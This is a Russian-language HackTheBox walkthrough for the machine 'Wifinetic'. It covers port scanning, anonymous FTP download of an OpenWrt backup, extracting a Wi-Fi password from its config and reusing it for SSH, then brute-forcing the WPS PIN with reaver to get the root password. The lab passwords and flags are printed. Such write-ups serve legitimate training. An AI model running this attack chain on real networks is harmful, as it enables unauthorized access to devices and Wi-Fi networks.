Обзор сервисов
Машине присвоен IP-адрес 10.10.11.247. Запустим стандартное сканирование портов с помощью nmap:
$ nmap -sV -sC -Pn -oN 10.10.11.247 10.10.11.247
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 05:11 EDT
Nmap scan report for 10.10.11.247
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.13
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
53/tcp open tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.42 seconds
Нетипичные порты для Linux-машин на HackTheBox - открыт FTP-порт.
FTP
Проверим, что имеется на FTP.
$ ftp 10.10.11.247
Connected to 10.10.11.247.
220 (vsFTPd 3.0.3)
Name (10.10.11.247:user): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Нам разрешен анонимный вход. Посмотрим на доступные файлы:
ftp> ls
229 Entering Extended Passive Mode (|||46320|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
-rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
-rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
-rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf
226 Directory send OK.
Скачаем их на свою машину.
ftp> get MigrateOpenWrt.txt
ftp> get ProjectGreatMigration.pdf
ftp> get ProjectOpenWRT.pdf
ftp> get backup-OpenWrt-2023-07-26.tar
ftp> get employees_wellness.pdf
Распакуем резервную копию OpenWrt.
tar xvf backup-OpenWrt-2023-07-26.tar
После распаковки получаем копию каталога /etc. Это дает возможность нам узнать имя пользователя на машине:
$ cat etc/passwd
...
netadmin:x:999:999::/home/netadmin:/bin/false
А еще мы нашли пароль от Wi-Fi точки.
$ cat etc/config/wireless
...
config wifi-iface 'wifinet0'
option device 'radio0'
option mode 'ap'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
option wps_pushbutton '1'
config wifi-iface 'wifinet1'
option device 'radio1'
option mode 'sta'
option network 'wwan'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
Попробуем подключиться с этими кредами к машине по SSH:
$ ssh [email protected]
VeRyUniUqWiFIPasswrd1!
Пользовательский флаг
netadmin@wifinetic:~$ ls -la
total 44
drwxr-xr-x 5 netadmin netadmin 4096 Sep 17 08:49 .
drwxr-xr-x 24 root root 4096 Sep 11 16:58 ..
lrwxrwxrwx 1 root root 9 Sep 11 16:08 .bash_history -> /dev/null
-rw-r--r-- 1 netadmin netadmin 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 netadmin netadmin 3771 Feb 25 2020 .bashrc
drwx------ 2 netadmin netadmin 4096 Sep 11 16:40 .cache
drwx------ 3 netadmin netadmin 4096 Sep 17 08:49 .config
drwx------ 3 netadmin netadmin 4096 Sep 17 04:16 .gnupg
-rw------- 1 netadmin netadmin 38 Sep 17 03:48 .lesshst
-rw-r--r-- 1 netadmin netadmin 807 Feb 25 2020 .profile
-rw-r----- 1 root netadmin 33 Sep 17 02:40 user.txt
-rw------- 1 netadmin netadmin 831 Sep 17 04:04 .viminfo
netadmin@wifinetic:~$ cat user.txt
abb0437cd64e2c419b080bb0a36e1488
Повышение привилегий
В сетевых интерфейсах обнаруживаем Wi-Fi сети:
$ ip a
...
3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.1/24 brd 192.168.1.255 scope global wlan0
valid_lft forever preferred_lft forever
inet6 fe80::ff:fe00:0/64 scope link
valid_lft forever preferred_lft forever
4: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.23/24 brd 192.168.1.255 scope global dynamic wlan1
valid_lft 19097sec preferred_lft 19097sec
inet6 fe80::ff:fe00:100/64 scope link
valid_lft forever preferred_lft forever
5: wlan2: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000
link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
6: hwsim0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ieee802.11/radiotap 12:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
7: mon0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UNKNOWN group default qlen 1000
link/ieee802.11/radiotap 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
Проверим, какие точки в каком режиме работают:
$ iwconfig
eth0 no wireless extensions.
wlan2 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
mon0 IEEE 802.11 Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan1 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
hwsim0 no wireless extensions.
wlan0 IEEE 802.11 Mode:Master Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
lo no wireless extensions.
wlan0 работает в режиме master, то есть это точка, к которой подключаются другие клиенты.
Мы можем попытаться подобрать WPS пин-код. Внезапно, на машине установлен reaver, с помощью которого мы будем его подбирать.
$ reaver -i wlan0 -b 02:00:00:00:00:00 -v
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[X] ERROR: pcap_activate status -1
[X] PCAP: generic error code
couldn't get pcap handle, exiting
Однако у нас нет прав. Попробуем аналогично на мониторинговой сети mon0.
$ reaver -i mon0 -b 02:00:00:00:00:00 -v
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[!] Found packet with bad FCS, skipping…
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
Пин-кодом оказался 12345670. Отсюда найден пароль WhatIsRealAnDWhAtIsNot51121!.
Попробуем этот пароль в качестве пароля рута:
$ su
WhatIsRealAnDWhAtIsNot51121!
Флаг суперпользователя
root@wifinetic:/tmp# cd /root/
root@wifinetic:~# cat root.txt
0cd2983e7be4c391d7077f029f3bead5
